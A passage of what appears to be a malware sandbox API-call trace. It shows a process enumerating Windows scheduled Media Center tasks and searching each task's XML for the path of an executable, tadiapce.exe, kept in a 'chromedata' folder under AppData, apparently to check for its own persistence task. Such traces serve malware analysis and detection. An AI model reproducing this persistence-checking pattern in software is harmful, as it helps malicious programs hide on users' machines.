<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoConfigureInternetTimeService</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.121] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoConfigureInternetTimeService</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.140] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.140] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x3, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.140] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="DispatchRecoveryTasks") returned 0x0
	[0099.140] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoRecoveryTasks $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.143] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoRecoveryTasks $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.163] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.163] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x4, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.163] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="ehDRMInit") returned 0x0
	[0099.163] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ehDRMInit</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DRMInit</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.165] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ehDRMInit</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DRMInit</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.184] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.184] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x5, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.184] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="InstallPlayReady") returned 0x0
	[0099.184] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\InstallPlayReady</URI>\r\n    <Date>2008-02-08T15:02:27.7076832</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/InstallPlayReady $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.186] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\InstallPlayReady</URI>\r\n    <Date>2008-02-08T15:02:27.7076832</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/InstallPlayReady $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.206] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.206] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x6, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.206] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="mcupdate") returned 0x0
	[0099.206] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\mcupdate</URI>\r\n    <Date>1982-01-15T16:30:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-125)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-126)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>6</Priority>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.208] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\mcupdate</URI>\r\n    <Date>1982-01-15T16:30:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-125)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-126)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>6</Priority>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.230] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.230] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x7, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.230] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="MediaCenterRecoveryTask") returned 0x0
	[0099.230] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-137)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-138)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-MediaCenterRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{23E5D772-327A-42f5-BDEE-C65C6796BB2A}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.232] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-137)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-138)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-MediaCenterRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{23E5D772-327A-42f5-BDEE-C65C6796BB2A}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.256] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.256] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x8, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.256] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="ObjectStoreRecoveryTask") returned 0x0
	[0099.256] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-131)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-132)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-ObjectStoreRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{177AFECE-9599-46cf-90D7-68EC9EEB27B4}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.259] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-131)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-132)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-ObjectStoreRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{177AFECE-9599-46cf-90D7-68EC9EEB27B4}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.281] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.281] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x9, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.281] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="OCURActivate") returned 0x0
	[0099.281] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\OCURActivate</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions 